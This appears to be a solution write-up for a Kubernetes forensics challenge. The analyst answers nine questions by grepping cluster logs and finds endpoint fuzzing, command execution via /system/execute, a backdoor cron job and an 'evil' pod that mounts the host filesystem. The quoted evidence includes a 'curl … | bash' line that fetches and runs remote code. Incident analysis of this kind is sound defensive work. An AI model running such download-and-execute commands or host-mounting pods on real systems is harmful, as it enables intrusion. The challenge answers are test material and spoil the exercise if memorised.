OPTinselTrace24-2: Cookie Consumption Sherlock Scenario
Santa’s North Pole Operations have implemented the “Cookie Consumption Scheduler” (CCS), a crucial service running on a Kubernetes cluster. This service ensures Santa’s cookie and milk intake is balanced during his worldwide deliveries, optimizing his energy levels and health.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 Task 1 How many replicas are configured for the flask-app deployment? Integer, e.g - 65 Task 2 What is the NodePort through which the flask-app is exposed? *****/TCP Task 3 What time (UTC) did the attacker first initiate fuzzing on the /system/ endpoint? YYYY-MM-DD hh:mm:ss Task 4 Which endpoint did the attacker discover through fuzzing and subsequently exploit? /system/******* Task 5 Which program did the attacker attempt to install to access their HTTP pages? **** Task 6 What is the IP address of the attacker? **.***.***.*** Task 7 What is the name of the pod that was compromised and used by the attacker as the initial foothold? flask-app-**********-***** Task 8 What is the name of the malicious pod created by the attacker? Task 9 What is the absolute path of the backdoor file left behind by the attacker?
task 1
3
1 2 3 4 5 6 └─$ grep 'replicas ' ./* -r ./default/describes/deployments.log:NewReplicaSet: flask-app-77fbdcfcff (3/3 replicas created) ./kube-system/describes/deployments.log:NewReplicaSet: coredns-7b98449c4 (1/1 replicas created) ./kube-system/describes/deployments.log:NewReplicaSet: local-path-provisioner-595dcfc56f (1/1 replicas created) ./kube-system/describes/deployments.log:NewReplicaSet: metrics-server-cdcc87586 (1/1 replicas created) ./kube-system/describes/deployments.log:NewReplicaSet: traefik-d7c9c5778 (1/1 replicas created)
task 2 What is the NodePort through which the flask-app is exposed?
30000/TCP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 └─$ head -30 ./default/describes/services.log Name: flask-app-service Namespace: default Labels: <none> Annotations: <none> Selector: app=flask-app Type: NodePort IP Family Policy: SingleStack IP Families: IPv4 IP: 10.43.58.30 IPs: 10.43.58.30 Port: <unset> 5000/TCP TargetPort: 5000/TCP NodePort: <unset> 30000/TCP Endpoints: 10.42.0.14:5000,10.42.0.16:5000,10.42.0.17:5000 Session Affinity: None External Traffic Policy: Cluster Events: <none>
task 3 What time (UTC) did the attacker first initiate fuzzing on the /system/ endpoint?
2024-11-08 22:02:48
1 2 3 4 5 6 └─$ grep -a -i '/system/' ./* -r|sort -u|head -30 ./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:01:37] "GET /system/status?service=ssh HTTP/1.1" 500 - ./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:38] "GET /system/logs?service=system HTTP/1.1" 500 - ./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:48] "GET /system/ls HTTP/1.1" 404 - ./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:02:56] "GET /system/admin HTTP/1.1" 404 - ./default/flask-app-77fbdcfcff-2tqgw/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:04:47] "GET /system/admin HTTP/1.1" 404 -
task 4 Which endpoint did the attacker discover through fuzzing and subsequently exploit?
/system/execute
1 2 3 4 5 6 7 8 9 10 11 └─$ grep -a 'system/execute' ./* -r |head -10 ./default/flask-app-77fbdcfcff-m9rh4/flask-app-previous.log:10.42.0.1 - - [07/Nov/2024 18:08:12] "POST /system/execute HTTP/1.1" 200 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:10:03] "GET /system/execute HTTP/1.1" 405 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:12:05] "GET /system/execute HTTP/1.1" 405 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:[2024-11-08 22:14:50,909] ERROR in app: Exception on /system/execute [POST] ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:14:50] "POST /system/execute HTTP/1.1" 500 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:[2024-11-08 22:15:23,483] ERROR in app: Exception on /system/execute [POST] ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:15:23] "POST /system/execute HTTP/1.1" 500 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:24:40] "POST /system/execute HTTP/1.1" 200 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:25:04] "POST /system/execute HTTP/1.1" 200 - ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:10.42.0.1 - - [08/Nov/2024 22:25:05] "POST /system/execute HTTP/1.1" 200 -
task 5 Which program did the attacker attempt to install to access their HTTP pages?
curl
1 2 3 4 5 6 7 8 9 └─$ grep 'curl' ./* -r ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:E: Unable to locate package curl ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:E: Unable to locate package curl ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log:sh: 1: curl: not found ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log: libbrotli1 libcurl4 libldap-2.5-0 libldap-common libnghttp2-14 libpsl5 ./default/flask-app-77fbdcfcff-m9rh4/flask-app.log: curl libbrotli1 libcurl4 libldap-2.5-0 libldap-common libnghttp2-14 libpsl5
task 6 What is the IP address of the attacker?
10.129.231.112
1 ./host-processes.log:root 98203 0.0 0.0 2576 888 ? S Nov08 0:00 sh -c curl 10.129.231.112:8080 | bash
task 7
flask-app-77fbdcfcff-2tqgw
1 2 ./system_logs/node_logs/flask-app-77fbdcfcff-2tqgw_default_flask-app-0c6f23d9953921a31ec11074089eb67299221b05410a12185af82d8272bf1af5.log:{"log":"E: Unable to locate package curl\n" ,"stream":"stderr","time":"2024-11-08T22:24:09.390009722Z"}
task 8 What is the name of the malicious pod created by the attacker?
evil
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 └─$ grep 'alpine' ./* -r -a ./default/processes/default_alpine_evil_process_dump.txt:Collecting processes for Namespace: default, Pod: alpine, Container: evil ./default/describes/pods.log:Name: alpine ./default/describes/pods.log: Image: alpine:latest ./default/describes/pods.log: Image ID: docker-pullable://alpine@sha256:beefdbd8a1da6d2915566fde36db9db0b524eb737fc57cd1367effd16dc0d06d ./default/alpine/evil-previous.log:Error from server (BadRequest): previous terminated container "evil" in pod "alpine" not found ----pods.log Name: alpine Namespace: default Priority: 0 Service Account: default Node: northpole/10.129.229.38 Start Time: Fri, 08 Nov 2024 22:39:47 +0000 Labels: <none> Annotations: <none> Status: Running IP: 10.129.229.38 IPs: IP: 10.129.229.38 IP: dead:beef::250:56ff:feb4:5a90 Containers: evil: Container ID: docker://f819d84f97e69fc0784c521760594cf1692c39bdc5fbd429f86aed07928a511c Image: alpine:latest Image ID: docker-pullable://alpine@sha256:beefdbd8a1da6d2915566fde36db9db0b524eb737fc57cd1367effd16dc0d06d Port: <none> Host Port: <none> Command: /bin/sh Args: -c sleep 300000 State: Running Started: Fri, 08 Nov 2024 22:39:51 +0000 Ready: True Restart Count: 0 Environment: <none> Mounts: /mnt from hostfs (rw) /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-n9bp9 (ro) Conditions: Type Status PodReadyToStartContainers True Initialized True Ready True ContainersReady True PodScheduled True Volumes: hostfs: Type: HostPath (bare host directory volume) Path: / HostPathType: kube-api-access-n9bp9: Type: Projected (a volume that contains injected data from multiple sources) TokenExpirationSeconds: 3607 ConfigMapName: kube-root-ca.crt ConfigMapOptional: <nil> DownwardAPI: true QoS Class: BestEffort Node-Selectors: <none> Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s node.kubernetes.io/unreachable:NoExecute op=Exists for 300s Events: <none>
task 9 What is the absolute path of the backdoor file left behind by the attacker?
/opt/backdoor.sh
1 2 └─$ grep '/opt/' ./* -r|head -20 ./cron.txt:*/5 * * * * /opt/backdoor.sh
